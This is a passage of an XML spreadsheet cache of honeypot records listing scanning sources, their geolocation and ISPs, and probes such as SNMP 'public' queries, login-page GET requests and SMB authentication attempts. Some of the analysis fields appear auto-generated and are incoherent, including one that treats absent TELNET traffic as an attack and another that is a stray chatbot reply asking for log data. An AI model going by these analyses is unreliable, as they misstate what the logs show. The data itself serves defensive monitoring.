    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="523"/>
    <x v="523"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T23:16:49"/>
    <d v="2025-04-28T23:01:24"/>
    <d v="2025-04-28T23:16:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:e5cc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected. _x000a_TELNET is typically used for remote access, but its absence here could indicate a malicious attempt to exploit the service. This lack of activity may be due to either an attacker bypassing or not targeting this particular service."/>
    <s v="Scan Attempt"/>
  </r>
  <r>
    <x v="524"/>
    <x v="524"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T23:14:30"/>
    <d v="2025-04-28T23:14:30"/>
    <d v="2025-04-28T23:14:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="135377"/>
    <s v="UCLOUD-HK-AS-AP"/>
    <s v="Ucloud Information Technology (Hk) Limited"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9820:d685"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="525"/>
    <x v="525"/>
    <s v="NA&amp;&amp;crawler74.deepfield.net&amp;&amp;crawler074.deepfield.net"/>
    <x v="0"/>
    <d v="2025-04-28T23:11:00"/>
    <d v="2024-11-21T13:52:50"/>
    <d v="2025-04-28T23:11:00"/>
    <n v="211"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_MT-CPA_H33"/>
    <s v="161&amp;&amp;110&amp;&amp;123&amp;&amp;80&amp;&amp;9100&amp;&amp;3306&amp;&amp;25&amp;&amp;443&amp;&amp;21846&amp;&amp;6379&amp;&amp;23&amp;&amp;6667&amp;&amp;143&amp;&amp;21&amp;&amp;1433&amp;&amp;21926&amp;&amp;21915&amp;&amp;NA&amp;&amp;21585&amp;&amp;21734"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WI"/>
    <s v="Wisconsin"/>
    <s v="Wood"/>
    <s v="Port Edwards"/>
    <s v="5267769"/>
    <s v="54469"/>
    <s v="44.3426"/>
    <s v="-89.8597"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Internet Utilities NA LLC"/>
    <s v="hosting"/>
    <s v="CyberOneData LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': '                    CAPA'}}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': '38.54.79.122:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'cmd': 'User-Agent:'}}&amp;&amp;{Data_POP3:{'args': '*/*', 'cmd': 'Accept:'}}&amp;&amp;{Data_POP3:{'args': 'gzip', 'cmd': 'Accept-Encoding:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '185.255.123.181:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'cmd': 'User-Agent:'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/manage/account/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/manage/account/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/admin/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68ea:734a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="526"/>
    <x v="526"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:29:27"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-28T22:29:27"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;33285&amp;&amp;3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="133275"/>
    <s v="Gigantic Infotel Pvt Ltd"/>
    <s v="Gigantic Network Solution"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2014-10-07"/>
    <s v="GTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,62400)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,55704)}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,56385)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf9:344a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="527"/>
    <x v="527"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:27:40"/>
    <d v="2023-11-28T08:31:38"/>
    <d v="2025-04-28T22:27:40"/>
    <n v="305"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;57792&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="3448439"/>
    <s v="01000-000"/>
    <s v="-23.5558"/>
    <s v="-46.6396"/>
    <s v="271402"/>
    <s v="Live Conect Telecomunicações Ltda."/>
    <s v="Live Conect Telecomunicações Ltda."/>
    <s v="business"/>
    <s v="Live Conect Telecomunicações Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56822)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,63083)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,63860)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,54174)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,54349)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51296)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51931)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,52044)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56320)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56595)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,64783)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65034)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,57229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,57491)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65350)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,62704)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,62800)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,49932)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c827:2813"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is scanning the network for vulnerable services, attempting to exploit them for further malicious activities such as data theft, unauthorized access, and potentially even deploying malware."/>
    <s v="NCRACK Attempt"/>
  </r>
  <r>
    <x v="528"/>
    <x v="528"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:12:12"/>
    <d v="2025-04-05T04:21:51"/>
    <d v="2025-04-28T22:12:12"/>
    <n v="103"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Bernardo do Campo"/>
    <s v="São Bernardo do Campo"/>
    <s v="3449344"/>
    <s v="NA"/>
    <s v="-23.6939"/>
    <s v="-46.565"/>
    <s v="266953"/>
    <s v="ARGO PROVEDOR DE INTERNET LTDA"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="business"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de2:50d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="529"/>
    <x v="529"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:10:41"/>
    <d v="2024-12-07T23:58:22"/>
    <d v="2025-04-28T22:10:41"/>
    <n v="96"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H32"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA&amp;&amp;52594"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.29229"/>
    <s v="103.808"/>
    <s v="9506"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="Singapore Telecommunications Ltd, Magix Services"/>
    <s v="residential"/>
    <s v="Singtel Fibre"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,58186)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,58528)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57433)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57657)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57403)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,53961)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,54364)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52891)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,53065)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,50645)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,50839)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52640)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52702)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,59062)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4ff:643a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No available log data provided. _x000a__x000a_However, if you provide some log data I can analyze it for possible malicious activity as per your request."/>
    <m/>
  </r>
  <r>
    <x v="530"/>
    <x v="530"/>
    <s v="host-79-8-56-234.business.telecomitalia.it&amp;&amp;NA"/>
